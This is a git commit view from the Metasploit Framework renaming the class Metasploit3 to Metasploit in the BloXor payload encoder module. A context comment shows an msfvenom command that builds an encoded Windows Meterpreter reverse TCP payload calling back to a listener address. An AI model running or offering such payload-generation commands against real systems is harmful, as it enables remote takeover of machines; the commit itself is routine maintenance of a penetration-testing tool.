change remaining class names

bug/bundler_fix
Christian Mehlmauer 2016-03-07 09:58:21 +01:00
parent 3da9535e22
commit 62217fff2b
No known key found for this signature in database
GPG Key ID: DCF54A05D6E62591
1 changed files with 1 additions and 1 deletions

View File

@ -24,7 +24,7 @@ require 'rex/encoder/bloxor/bloxor'
# >ruby msfvenom -p windows/meterpreter/reverse_tcp RHOST=192.168.2.2 LHOST=192.168.2.1 LPORT=80 -a x86 -e x86/bloxor -b '\x00' -f raw | ndisasm -b32 -k 128,1 -
#
class Metasploit3 < Rex::Encoder::BloXor
class Metasploit < Rex::Encoder::BloXor
# Note: Currently set to manual, bump it up to automatically get selected by the framework.
# Note: BloXor by design is slow due to its exhaustive search for a solution.